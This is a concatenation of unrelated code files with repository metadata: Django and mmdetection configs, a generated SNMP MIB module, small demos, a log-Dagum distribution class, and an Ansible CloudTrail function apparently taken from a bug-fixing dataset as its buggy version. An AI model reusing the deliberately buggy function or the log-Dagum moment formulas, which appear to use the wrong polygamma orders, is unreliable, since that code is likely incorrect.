'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"[email protected]"
] | |
261a0e0bb3133e20df3e76e1fdd109448d018b8c
|
9ef7093ffa3bbb916e197ba6788aa3c13dc034dd
|
/configs/underwaterdataset/reppoints_moment_r50_fpn_2x_mt.py
|
a03ed5bd5954ecf0b1fa1cdec5e5f447f67c00c3
|
[
"Apache-2.0"
] |
permissive
|
coldsummerday/mmdetection-zhou
|
aae3b50ecddf227f0802c2e5b51622168714fab5
|
c333f06f4ffb22131a6f30e6468c82b926e5c87f
|
refs/heads/master
| 2020-12-10T07:34:49.813269 | 2020-03-10T08:52:10 | 2020-03-10T08:52:10 | 233,536,042 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,428 |
py
|
# model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=5,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='moment'))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'UnderWaterDataset'
data_root = '/home/ices18/data/underwaterobjectdetection/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=[(1333, 480), (1333, 960)],
keep_ratio=True,
multiscale_mode='range'),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=4,
workers_per_gpu=2,
train=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.0025, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[16, 22])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 24
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/reppoints_moment_r50_fpn_2x_mt'
load_from = None
resume_from = None
auto_resume = True
workflow = [('train', 1)]
|
[
"[email protected]"
] | |
0c808994fa59f2de1512003d66c1b90c255c8e86
|
147648c6b25ecc33e82a36b36de6623df9340e62
|
/examples/docs_snippets/docs_snippets/legacy/dagster_pandas_guide/shape_constrained_trip.py
|
919727954440fecaff0a49b7ac4c1ac7266f5a30
|
[
"Apache-2.0"
] |
permissive
|
asdlei99/dagster
|
be81009ff00dbad02f7cec974650388a5cc2af59
|
bbfd1a22e85a10881d7dbbcc888957a487f0c3e5
|
refs/heads/master
| 2023-08-28T07:18:23.838943 | 2021-11-08T23:09:07 | 2021-11-08T23:09:07 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 820 |
py
|
from datetime import datetime
from dagster import Out, job, op
from dagster.utils import script_relative_path
from dagster_pandas import RowCountConstraint, create_dagster_pandas_dataframe_type
from pandas import DataFrame, read_csv
# start_create_type
ShapeConstrainedTripDataFrame = create_dagster_pandas_dataframe_type(
name="ShapeConstrainedTripDataFrame", dataframe_constraints=[RowCountConstraint(4)]
)
# end_create_type
@op(out=Out(ShapeConstrainedTripDataFrame))
def load_shape_constrained_trip_dataframe() -> DataFrame:
return read_csv(
script_relative_path("./ebike_trips.csv"),
parse_dates=["start_time", "end_time"],
date_parser=lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S.%f"),
)
@job
def shape_constrained_trip():
load_shape_constrained_trip_dataframe()
|
[
"[email protected]"
] | |
f91c21338397820c8cb715e928035e1704768951
|
85a9ffeccb64f6159adbd164ff98edf4ac315e33
|
/pysnmp/ADTRAN-ATLAS-VOICE-MIB.py
|
4b219ec7f7721d37628adad553700cd8f6071463
|
[
"Apache-2.0"
] |
permissive
|
agustinhenze/mibs.snmplabs.com
|
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
refs/heads/master
| 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 |
Apache-2.0
| 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null |
UTF-8
|
Python
| false | false | 7,407 |
py
|
#
# PySNMP MIB module ADTRAN-ATLAS-VOICE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ADTRAN-ATLAS-VOICE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 16:59:20 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, ConstraintsIntersection, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ValueRangeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Integer32, iso, NotificationType, IpAddress, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, TimeTicks, Counter32, MibIdentifier, ObjectIdentity, Counter64, Unsigned32, Bits, Gauge32, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "iso", "NotificationType", "IpAddress", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises", "TimeTicks", "Counter32", "MibIdentifier", "ObjectIdentity", "Counter64", "Unsigned32", "Bits", "Gauge32", "ModuleIdentity")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
adtran = MibIdentifier((1, 3, 6, 1, 4, 1, 664))
adMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2))
adATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154))
adGenATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1))
adATLASVoicemg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10))
adATLASVoiceIfNumber = MibScalar((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfNumber.setStatus('mandatory')
adATLASVoiceIfTable = MibTable((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2), )
if mibBuilder.loadTexts: adATLASVoiceIfTable.setStatus('mandatory')
adATLASVoiceIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1), ).setIndexNames((0, "ADTRAN-ATLAS-VOICE-MIB", "adATLASVoiceIfIndex"))
if mibBuilder.loadTexts: adATLASVoiceIfEntry.setStatus('mandatory')
adATLASVoiceIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfIndex.setStatus('mandatory')
adATLASVoiceIfSlotNum = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfSlotNum.setStatus('mandatory')
adATLASVoiceIfPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfPortNum.setStatus('mandatory')
adATLASVoiceIfPortStat = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24))).clone(namedValues=NamedValues(("inactive", 1), ("disabled", 2), ("idle", 3), ("test", 4), ("tipOpen", 5), ("offhook", 6), ("reverseBattery", 7), ("testActive", 8), ("testOffhook", 9), ("testRevBatt", 10), ("testRinging", 11), ("testTipOpen", 12), ("testTipOpenRingGND", 13), ("testDisabled", 14), ("testRingOffhook", 15), ("testLO", 16), ("testLCNormTRPolarity", 17), ("testLCNoBatt", 18), ("testLCRevTRPolarity", 19), ("testRingGND", 20), ("transOnly", 21), ("testELeadOpen", 22), ("testELeadClosed", 23), ("callInProgress", 24)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfPortStat.setStatus('mandatory')
adATLASVoiceIfTxSignalBits = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(4, 4)).setFixedLength(4)).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfTxSignalBits.setStatus('mandatory')
adATLASVoiceIfRxSignalBits = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(4, 4)).setFixedLength(4)).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfRxSignalBits.setStatus('mandatory')
adATLASVoiceTstTable = MibTable((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3), )
if mibBuilder.loadTexts: adATLASVoiceTstTable.setStatus('mandatory')
adATLASVoiceTstEntry = MibTableRow((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1), ).setIndexNames((0, "ADTRAN-ATLAS-VOICE-MIB", "adATLASVoiceTstIndex"))
if mibBuilder.loadTexts: adATLASVoiceTstEntry.setStatus('mandatory')
adATLASVoiceTstIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceTstIndex.setStatus('mandatory')
adATLASVoiceTst2W = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))).clone(namedValues=NamedValues(("off", 1), ("loopOpen", 2), ("loopClosed", 3), ("ringGround", 4), ("active", 5), ("tipOpen", 6), ("reverseBattery", 7), ("disable", 8), ("ringing", 9), ("eLeadOpen", 10), ("eLeadClosed", 11)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: adATLASVoiceTst2W.setStatus('mandatory')
adATLASVoiceTstTxABCD = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("txOff", 1), ("tx0000", 2), ("tx0101", 3), ("tx1010", 4), ("tx1111", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: adATLASVoiceTstTxABCD.setStatus('mandatory')
adATLASVoiceTst1kHzTone = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("near", 2), ("far", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: adATLASVoiceTst1kHzTone.setStatus('mandatory')
adATLASVoiceTstLpBk = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("analog", 2), ("digital", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: adATLASVoiceTstLpBk.setStatus('mandatory')
mibBuilder.exportSymbols("ADTRAN-ATLAS-VOICE-MIB", adATLASVoiceIfNumber=adATLASVoiceIfNumber, adATLASVoiceIfPortStat=adATLASVoiceIfPortStat, adATLASVoiceTst2W=adATLASVoiceTst2W, adATLASVoiceIfTxSignalBits=adATLASVoiceIfTxSignalBits, adATLASVoiceIfSlotNum=adATLASVoiceIfSlotNum, adMgmt=adMgmt, adATLASmg=adATLASmg, adATLASVoiceTstEntry=adATLASVoiceTstEntry, adATLASVoiceIfEntry=adATLASVoiceIfEntry, adATLASVoicemg=adATLASVoicemg, adATLASVoiceIfTable=adATLASVoiceIfTable, adATLASVoiceIfPortNum=adATLASVoiceIfPortNum, adATLASVoiceTstLpBk=adATLASVoiceTstLpBk, adGenATLASmg=adGenATLASmg, adATLASVoiceTstIndex=adATLASVoiceTstIndex, adtran=adtran, adATLASVoiceTstTable=adATLASVoiceTstTable, adATLASVoiceTst1kHzTone=adATLASVoiceTst1kHzTone, adATLASVoiceIfIndex=adATLASVoiceIfIndex, adATLASVoiceIfRxSignalBits=adATLASVoiceIfRxSignalBits, adATLASVoiceTstTxABCD=adATLASVoiceTstTxABCD)
|
[
"[email protected]"
] | |
02f6ddcfd40e620fba1b316addc8157b0fccbf16
|
8a74a679fd53fa909d4cc7221d477ce21a1c3566
|
/PYTHON/remove_duplicates.py
|
e5dae22358ca2965e82c5cf9443a3104ca841f0f
|
[
"MIT"
] |
permissive
|
pawarspeaks/HACKTOBERFEST2021-2
|
1082245d10d1bd76a4b9900223e701ab95b881e8
|
1b53ba18b78d489c2b13d331d70e35e8a8566e93
|
refs/heads/main
| 2023-09-01T11:11:05.310810 | 2021-10-30T16:20:42 | 2021-10-30T16:20:42 | 422,931,347 | 4 | 0 |
MIT
| 2021-10-30T16:20:06 | 2021-10-30T16:20:05 | null |
UTF-8
|
Python
| false | false | 599 |
py
|
# Question Link : https://leetcode.com/problems/remove-duplicates-from-sorted-list/
class Solution:
def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:
prev = head
current = head
if head:
val = head.val
head = head.next
while (head != None):
if head.val == val:
prev.next = head.next
head = head.next
else:
val = head.val
prev = head
head = head.next
return current
|
[
"[email protected]"
] | |
05877846d04c4a9261d06974e881b4c047c5ef65
|
ee4d59c295d3060077f5dc3e35aaf0458b31eb32
|
/Main/VideoFilter/ConvolutionFiltering/BlurAvgApi.py
|
95c97dd9fbeae3b5295c9e3a2bc9194bb5231df4
|
[] |
no_license
|
GeonwooVincentKim/Python_OpenCV_MiniProject
|
eb82f9102352f0fc809c05eeaddbceffaf4e1313
|
c59f99ba74a07e6b2b442bf95b90f041f42d2521
|
refs/heads/master
| 2023-04-22T14:33:41.219214 | 2021-04-20T12:18:34 | 2021-04-20T12:18:34 | 298,581,249 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 282 |
py
|
import cv2
import numpy as np
file_name = '../../../img/taekwonv1.jpg'
img = cv2.imread(file_name)
blur1 = cv2.blur(img, (10, 10))
blur2 = cv2.boxFilter(img, -1, (10, 10))
merged = np.hstack((img, blur1, blur2))
cv2.imshow('blur', merged)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
7f93cd2bf483be0a0bf39ca8ca709c19d84c5988
|
3b504a983f1807ae7c5af51078bfab8c187fc82d
|
/client/gui/HUD2/features/BattleReplay/BattleReplayModel.py
|
d21709f49d792212b7e0c0469bd4dca973d7509b
|
[] |
no_license
|
SEA-group/wowp_scripts
|
7d35fd213db95ea6b3dbd1ec6d3e0f13de86ba58
|
2fe54a44df34f2dcaa6860a23b835dcd8dd21402
|
refs/heads/master
| 2021-09-07T23:10:13.706605 | 2018-03-02T17:23:48 | 2018-03-02T17:23:48 | 117,280,141 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 649 |
py
|
# Embedded file name: scripts/client/gui/HUD2/features/BattleReplay/BattleReplayModel.py
from gui.HUD2.core.AutoFilledDataModel import AutoFilledDataModel
from gui.HUD2.core.DataModel import Structure, FloatT, BoolT, StringT
from gui.HUD2.features.BattleReplay.BattleReplayController import BattleReplayController
from gui.HUD2.features.BattleReplay.BattleReplaySource import BattleReplaySource
class BattleReplayModel(AutoFilledDataModel):
DATA_SOURCE = BattleReplaySource
CONTROLLER = BattleReplayController
SCHEME = Structure(panelVisibility=BoolT, speed=StringT, isPaused=BoolT, timeMax=FloatT, timeCurrent=FloatT)
source = None
|
[
"[email protected]"
] | |
3f5d45e43c6ad95997e06aaa1425c98108431191
|
5b4c803f68e52849a1c1093aac503efc423ad132
|
/UnPyc/tests/tests/all_opcodes/complex_if2.py
|
195df3f53cd7ccdacfb2f828fa8f20736d4dc093
|
[] |
no_license
|
Prashant-Jonny/UnPyc
|
9ce5d63b1e0d2ec19c1faa48d932cc3f71f8599c
|
4b9d4ab96dfc53a0b4e06972443e1402e9dc034f
|
refs/heads/master
| 2021-01-17T12:03:17.314248 | 2013-02-22T07:22:35 | 2013-02-22T07:22:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 47 |
py
|
if not(a == 1 and b == 2):
x = 1
else:
x = 2
|
[
"[email protected]"
] | |
1919b311e39568cc7ff40ef676dad61a16346bb4
|
10e1d1ec2eb7d1ff991d4286006dbbaa5a5e1760
|
/dist/src/dists/logdagum.py
|
4c1d97a901cf2c449eb0e094a7f17cded07d0f12
|
[] |
no_license
|
mudkip201/distributions
|
dd904d462fedf97012ed8057244b0ac496392352
|
dc8b6e3a6b59c1552c9726f760b047eaff3f32ef
|
refs/heads/master
| 2020-11-29T15:23:21.580157 | 2017-11-20T20:40:29 | 2017-11-20T20:40:29 | 87,482,965 | 1 | 0 | null | 2017-07-19T17:11:47 | 2017-04-06T23:06:26 |
Python
|
UTF-8
|
Python
| false | false | 2,121 |
py
|
'''
Created on Jul 18, 2017
@author: matthewcowen-green
'''
import dists.Distribution.Distribution as Distribution
import dists.Distribution as ds
import math
import scipy.special as sp
class logdagum(Distribution):
@staticmethod
def pdf(b,d,l,x):
return b*l*d*math.exp(-d*x)*math.pow(1+l*math.exp(-d*x),-b-1)
@staticmethod
def cdf(b,d,l,x):
return math.pow(1+l*math.exp(-d*x),-b)
@staticmethod
def random(b,d,l):
u=ds.rg0()
return math.log(l/(math.pow(u,-1/b)-1))/d
@staticmethod
def mean(b,d,l):
return (math.log(l)+sp.digamma(b)-sp.digamma(1))/d
@staticmethod
def median(b,d,l):
return math.log(l/(math.pow(1/2,-1/b)-1))/d
@staticmethod
def mode(b,d,l):
if(b*d>1):
return math.log(l*b)/d
return None
@staticmethod
def variance(b,d,l):
return ((sp.polygamma(3,b)+sp.polygamma(3,1))+math.pow(logdagum.mean(b,d,l),2))/math.pow(d,2)-math.pow(logdagum.mean(b,d,l),2)
@staticmethod
def stddev(b,d,l):
return math.sqrt(logdagum.variance(b,d,l))
@staticmethod
def kurtosis(b,d,l):
e1=sp.polygamma(5,b)+sp.polygamma(5,1)
e2=3*(sp.polygamma(3,b)+sp.polygamma(3,1))**2
e3=4*(math.log(l)+sp.digamma(b)-sp.digamma(1))*(sp.polygamma(4,b)-sp.polygamma(4,1))
e4=6*(math.log(l)+sp.digamma(b)-sp.digamma(1))**2*(sp.polygamma(3,b)+sp.polygamma(3,1))
e5=(math.log(l)+sp.digamma(b)-sp.digamma(1))**4
return (e1+e2+e3+e4+e5)/(d**4)/logdagum.variance(b,d,l)**2
@staticmethod
def entropy():
pass
@staticmethod
def skewness(b,d,l):
e1=sp.polygamma(4,b)-sp.polygamma(4,1)
e2=math.pow(math.log(l)+sp.digamma(b)-sp.digamma(1),3)
e3=3*(math.log(l)+sp.digamma(b)-sp.digamma(1))*(sp.polygamma(3,b)+sp.polygamma(3,1))
return ((e1+e2+e3)/(d**3)-3*logdagum.mean(b,d,l)*logdagum.variance(b,d,l)-logdagum.mean(b,d,l)**3)/logdagum.stddev(b,d,l)**3
@staticmethod
def ppf(b,d,l,q):
return math.log(l/(math.pow(q,-1/b)-1))/d
@staticmethod
def mle():
pass
|
[
"[email protected]"
] | |
a528126e75a4f20eaadf3ed8b12152ba16d83163
|
f07a42f652f46106dee4749277d41c302e2b7406
|
/Data Set/bug-fixing-1/92b3d792837f65e6264ce4b4a4fb1459dad94a6e-<main>-bug.py
|
5bbb64f1f31e353b094838ed127dd869876130a3
|
[] |
no_license
|
wsgan001/PyFPattern
|
e0fe06341cc5d51b3ad0fe29b84098d140ed54d1
|
cc347e32745f99c0cd95e79a18ddacc4574d7faa
|
refs/heads/main
| 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,787 |
py
|
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(state=dict(default='present', choices=['present', 'absent', 'enabled', 'disabled']), name=dict(default='default'), enable_logging=dict(default=True, type='bool'), s3_bucket_name=dict(), s3_key_prefix=dict(), sns_topic_name=dict(), is_multi_region_trail=dict(default=False, type='bool'), enable_log_file_validation=dict(default=False, type='bool', aliases=['log_file_validation_enabled']), include_global_events=dict(default=True, type='bool', aliases=['include_global_service_events']), cloudwatch_logs_role_arn=dict(), cloudwatch_logs_log_group_arn=dict(), kms_key_id=dict(), tags=dict(default={
}, type='dict')))
required_if = [('state', 'present', ['s3_bucket_name']), ('state', 'enabled', ['s3_bucket_name'])]
required_together = [('cloudwatch_logs_role_arn', 'cloudwatch_logs_log_group_arn')]
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True, required_together=required_together, required_if=required_if)
if (not HAS_BOTO3):
module.fail_json(msg='boto3 is required for this module')
if (module.params['state'] in ('present', 'enabled')):
state = 'present'
elif (module.params['state'] in ('absent', 'disabled')):
state = 'absent'
tags = module.params['tags']
enable_logging = module.params['enable_logging']
ct_params = dict(Name=module.params['name'], S3BucketName=module.params['s3_bucket_name'], IncludeGlobalServiceEvents=module.params['include_global_events'], IsMultiRegionTrail=module.params['is_multi_region_trail'], EnableLogFileValidation=module.params['enable_log_file_validation'], S3KeyPrefix='', SnsTopicName='', CloudWatchLogsRoleArn='', CloudWatchLogsLogGroupArn='', KmsKeyId='')
if module.params['s3_key_prefix']:
ct_params['S3KeyPrefix'] = module.params['s3_key_prefix'].rstrip('/')
if module.params['sns_topic_name']:
ct_params['SnsTopicName'] = module.params['sns_topic_name']
if module.params['cloudwatch_logs_role_arn']:
ct_params['CloudWatchLogsRoleArn'] = module.params['cloudwatch_logs_role_arn']
if module.params['cloudwatch_logs_log_group_arn']:
ct_params['CloudWatchLogsLogGroupArn'] = module.params['cloudwatch_logs_log_group_arn']
if module.params['kms_key_id']:
ct_params['KmsKeyId'] = module.params['kms_key_id']
try:
(region, ec2_url, aws_connect_params) = get_aws_connection_info(module, boto3=True)
client = boto3_conn(module, conn_type='client', resource='cloudtrail', region=region, endpoint=ec2_url, **aws_connect_params)
except ClientError as err:
module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))
results = dict(changed=False, exists=False)
trail = get_trail_facts(module, client, ct_params['Name'])
if (trail is not None):
results['exists'] = True
if ((state == 'absent') and results['exists']):
results['changed'] = True
results['exists'] = False
results['trail'] = dict()
if (not module.check_mode):
delete_trail(module, client, trail['TrailARN'])
elif ((state == 'present') and results['exists']):
do_update = False
for key in ct_params:
tkey = str(key)
if (key == 'EnableLogFileValidation'):
tkey = 'LogFileValidationEnabled'
if (ct_params.get(key) == ''):
val = None
else:
val = ct_params.get(key)
if (val != trail.get(tkey)):
do_update = True
results['changed'] = True
if module.check_mode:
trail.update({
tkey: ct_params.get(key),
})
if ((not module.check_mode) and do_update):
update_trail(module, client, ct_params)
trail = get_trail_facts(module, client, ct_params['Name'])
if (enable_logging and (not trail['IsLogging'])):
results['changed'] = True
trail['IsLogging'] = True
if (not module.check_mode):
set_logging(module, client, name=ct_params['Name'], action='start')
if ((not enable_logging) and trail['IsLogging']):
results['changed'] = True
trail['IsLogging'] = False
if (not module.check_mode):
set_logging(module, client, name=ct_params['Name'], action='stop')
tag_dry_run = False
if module.check_mode:
tag_dry_run = True
tags_changed = tag_trail(module, client, tags=tags, trail_arn=trail['TrailARN'], curr_tags=trail['tags'], dry_run=tag_dry_run)
if tags_changed:
results['changed'] = True
trail['tags'] = tags
results['trail'] = camel_dict_to_snake_dict(trail)
elif ((state == 'present') and (not results['exists'])):
results['changed'] = True
if (not module.check_mode):
created_trail = create_trail(module, client, ct_params)
tag_trail(module, client, tags=tags, trail_arn=created_trail['TrailARN'])
try:
status_resp = client.get_trail_status(Name=created_trail['Name'])
except ClientError as err:
module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))
if (enable_logging and (not status_resp['IsLogging'])):
set_logging(module, client, name=ct_params['Name'], action='start')
if ((not enable_logging) and status_resp['IsLogging']):
set_logging(module, client, name=ct_params['Name'], action='stop')
trail = get_trail_facts(module, client, ct_params['Name'])
if module.check_mode:
acct_id = '123456789012'
try:
sts_client = boto3_conn(module, conn_type='client', resource='sts', region=region, endpoint=ec2_url, **aws_connect_params)
acct_id = sts_client.get_caller_identity()['Account']
except ClientError:
pass
trail = dict()
trail.update(ct_params)
trail['LogFileValidationEnabled'] = ct_params['EnableLogFileValidation']
trail.pop('EnableLogFileValidation')
fake_arn = ((((('arn:aws:cloudtrail:' + region) + ':') + acct_id) + ':trail/') + ct_params['Name'])
trail['HasCustomEventSelectors'] = False
trail['HomeRegion'] = region
trail['TrailARN'] = fake_arn
trail['IsLogging'] = enable_logging
trail['tags'] = tags
results['trail'] = camel_dict_to_snake_dict(trail)
module.exit_json(**results)
|
[
"[email protected]"
] | |
52cfaa859b7fc79c6e21e658da2d2c8e37299b9f
|
55942d2d44f293bc05351a7c9836eb67c9acf5f6
|
/ecommerce/user_model/migrations/0006_auto_20190201_2041.py
|
6a9dba631afd1623f9823c7a2848bc174c907b98
|
[] |
no_license
|
Maheshwari2604/ecommerce
|
92c789524b7042def9621839cfe7e83776561814
|
1f58e23adb1185dee774bd90f793e0be3d4ad53f
|
refs/heads/master
| 2020-04-18T17:48:52.480108 | 2019-02-02T08:43:10 | 2019-02-02T08:43:10 | 167,665,723 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,369 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-02-01 20:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user_model', '0005_register_model_verified'),
]
operations = [
migrations.CreateModel(
name='address',
fields=[
